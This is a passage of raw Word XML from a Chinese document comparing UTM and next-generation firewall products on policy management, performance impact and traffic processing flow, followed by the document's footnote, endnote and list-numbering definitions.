      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="50AFDA04" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="793" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E46BAD5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策略配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A7A59D7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独立策略管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2299" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="02D56C7E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统一策略：允许销售组使用微信传文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4B024E8E" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="793" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="054BA6CC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1"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>性能影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="424A9456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开启全部功能时性能下降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70%+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2299" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="422971DF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
            <w:pPr>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pP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全功能开启性能下降</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>&lt;20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="328C6F8F" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A08FD9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="482"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键技术对比：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB5BF0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UTM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理流程：流量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IPS </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AV </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出（多次拆包检测）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C2D370" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NGFW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理流程：流量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单次拆包</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并行检测所有威胁</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3653F2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783F1FBC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46282E9E" w14:textId="5F49B4E3" w:rsidR="003619E5" w:rsidRPr="00CC243A" w:rsidRDefault="003619E5" w:rsidP="00CC243A">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003619E5" w:rsidRPr="00CC243A" w:rsidSect="00B13B9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531" w:bottom="1418" w:left="1531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C9F5B" w14:textId="77777777" w:rsidR="00854AE1" w:rsidRDefault="00854AE1" w:rsidP="00426A59">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="43DCEAC4" w14:textId="77777777" w:rsidR="00854AE1" w:rsidRDefault="00854AE1" w:rsidP="00426A59">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="324526DF" w14:textId="77777777" w:rsidR="00854AE1" w:rsidRDefault="00854AE1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09541" w14:textId="77777777" w:rsidR="003C0D75" w:rsidRDefault="003C0D75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9DEA" w14:textId="77777777" w:rsidR="003C0D75" w:rsidRDefault="003C0D75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746209"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="182FC5CA" w14:textId="77313819" w:rsidR="004E6F52" w:rsidRDefault="004E6F52" w:rsidP="00DB7BB0">
        <w:pPr>
          <w:pStyle w:val="a6"/>
          <w:ind w:firstLineChars="11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A8" w:rsidRPr="006F0DA8">
          <w:rPr>
            <w:noProof/>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>7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4E6CF" w14:textId="77777777" w:rsidR="00854AE1" w:rsidRDefault="00854AE1" w:rsidP="00426A59">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1FC00E93" w14:textId="77777777" w:rsidR="00854AE1" w:rsidRDefault="00854AE1" w:rsidP="00426A59">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="4B99D61B" w14:textId="77777777" w:rsidR="00854AE1" w:rsidRDefault="00854AE1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39D1" w14:textId="77777777" w:rsidR="003C0D75" w:rsidRDefault="003C0D7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ABC7" w14:textId="77777777" w:rsidR="003C0D75" w:rsidRDefault="003C0D7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3594B" w14:textId="77777777" w:rsidR="003C0D75" w:rsidRDefault="003C0D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2DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A41435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0C95B31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83D8665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0F42F42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DDA24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1F94D45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F07428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2077AF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0218BB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03340F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92AC56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04E02258"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83A82CB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09CA4BC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E2EBA6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0A190527"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD56F17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0AD36C57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="310632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0BA201BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55F659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0E2B40B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3AE55D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0E4E001E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="784A2B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0F155950"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18ACEBC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0F6141FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89E6A7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105A0F9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="194612D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108E559C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3338544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131A7AA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23A621F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165B64F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="848086D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179F655A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09D2FE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18802294"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71A8C32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19A037FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F6246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1CD8499A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FFAAF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2136489F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93908A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21E91809"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6AE4235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227F23DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDE29D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24F874D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0DCAB5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25EC01FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="354CF59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27E65EF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A948A0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28660AF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E30A743C"/>
    <w:lvl w:ilvl="0" w:tplc="5106B58C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8F85EF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="728026C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29D342F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52EEE9F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2AB35CE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86BAFD9C"/>
    <w:styleLink w:val="1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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B521EBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44085C3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2B935F4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F41EE08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2E827538"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F2AE7A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30C645B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A90237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31B403EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="88C0B21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33EE7B72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32A2FD7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34962A8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1576C9D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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="369B0D7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AC4FFE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376C6184"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93E0818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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="384035F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9058F5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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="38AA00C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C1EC9C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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3D2F0116"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1DC222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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E2F3FC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6CE936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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="402D5072"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C35088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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40C62151"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0549B4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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="41627D6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B0C4E7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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="442D2FEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="149CEA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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="44861B15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="454C03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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45674D89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="805487B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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46087611"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE06FC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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4798655F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F1C596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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="482F7AE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9082C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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A2A608B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E0E71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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4ABD04FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="213416D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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4B7635DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6372948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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4E3A5901"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEAADBC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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="53E134D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53D69B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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="546036D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60DC6A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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5471381F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="652A5A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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58531FCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52FCE9D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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A6E04E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78AE2C6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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A8A3776"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6D63A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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5AA9590B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87565D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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5AE83875"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F7A23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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B4F2296"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2128829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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B7A1F5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93D6E0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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BFB71D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF9E9934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70" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C4E55BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="891A16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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D7C391B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52DADE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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5EBD509E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA66B7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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="603C27ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF2AEC8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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="618F670E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C62515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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="627F5C42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B20EE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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="646A13D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DCF0A5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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65843DD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6FC70E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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6FC35D99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1226A60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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7166246D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="602A809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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="72CE2BDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="584231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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A7064E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="435815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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AF67D74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E7EC89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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7B194801"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86BAFD9C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="10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29"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="75"/>
  </w:num>
